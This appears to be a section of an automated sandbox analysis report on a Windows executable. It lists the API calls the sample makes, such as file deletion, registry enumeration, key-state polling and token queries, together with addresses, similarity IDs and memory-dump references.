                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F735C4
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00F73646
                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F7365C
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F7366D
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F7367F
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00F8AE87
                                                                                                                                                                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F8AE95
                                                                                                                                                                                                                                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F8AEC8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F8B09D
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C505
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F8C560
                                                                                                                                                                                                                                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F8C5C3
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00F8C606
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8C613
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F6D7CD,?), ref: 00F6E714
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F6D7CD,?), ref: 00F6E72D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6EAB0: GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F6ED8A
                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F6EDC3
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6EF02
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F6EF1A
                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00F6EF67
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F69534
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 00F695A5
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32 ref: 00F69604
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F69677
                                                                                                                                                                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F696A2
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00F795F3
                                                                                                                                                                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00F7961F
                                                                                                                                                                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00F79677
                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F7969C
                                                                                                                                                                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F796A4
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00F8999D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F89A2D
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00F89A49
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00F89A8F
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F89AAF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00F71A02,?,75C0E610), ref: 00F1F9F1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00F60354,00000000,00000000,?,?,00F71A02,?,75C0E610,?,00F60354), ref: 00F1FA18
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 666041331-0
APIs
• SetWindowLongW.USER32(00000002,000000F0,?), ref: 00F9766B
• SetWindowLongW.USER32(?,000000EC,?), ref: 00F97682
• SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00F976AB
• ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00F7B5BE,00000000,00000000), ref: 00F976D0
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00F976FF
Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: Window$Long$MessageSendShow
• String ID:
• API String ID: 3688381893-0
APIs
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
APIs
• GetCursorPos.USER32(?), ref: 00F019E1
• ScreenToClient.USER32(00000000,?), ref: 00F019FE
• GetAsyncKeyState.USER32(00000001), ref: 00F01A23
• GetAsyncKeyState.USER32(00000002), ref: 00F01A3D
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• GetInputState.USER32 ref: 00F74310
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F74367
• TranslateMessage.USER32(?), ref: 00F74390
• DispatchMessageW.USER32(?), ref: 00F7439A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F743AB
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
APIs
• GetWindowRect.USER32(?,?), ref: 00F62262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00F6230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00F62316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00F62327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F6232F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7D97D
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00F7D9B4
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7D9F9
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7DA0D
                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,00F7CC63,00000000), ref: 00F7DA37
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F961E4
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F9623C
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F9624E
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F96259
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F962B5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00F813AE
                                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00F813C5
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F81401
                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00F8140D
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00F81445
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00F3D146
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F3D169
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F33B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F26A79,?,0000015D,?,?,?,?,00F285B0,000000FF,00000000,?,?), ref: 00F33BC5
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F3D18F
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F3D1A2
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F3D1B1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _memcmp
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(0000000A,?,?,00F2F64E,00F2545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F33170
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F331A5
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00F331CC
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F331D9
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F331E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?,?,00F60C4E), ref: 00F6091B
                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60936
                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60944
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?), ref: 00F60954
                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F60831,80070057,?,?), ref: 00F60960
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F6F2AE
                                                                                                                                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 00F6F2BC
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00F6F2C4
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F6F2CE
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00F6F30A
                                                                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F61A60
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A6C
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A7B
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F614E7,?,?,?), ref: 00F61A82
                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F61A99
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F61976
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F61982
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61991
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F61998
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F619AE
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F61916
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F61922
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F61931
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F61938
                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F6194E
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CCB
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CD8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CE5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CF2
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70CFF
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00F70B24,?,00F73D41,?,00000001,00F43AF4,?), ref: 00F70D0C
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2988ad24e18b94d358ce1fae170054afe265775a01dd7b645c3891da14bb8f22
                                                                                                                                                                                                                                                                                        • Instruction ID: a2abd91b660029d849a2f269718ea9ab3084af2de6256448fc10b78192898d0a
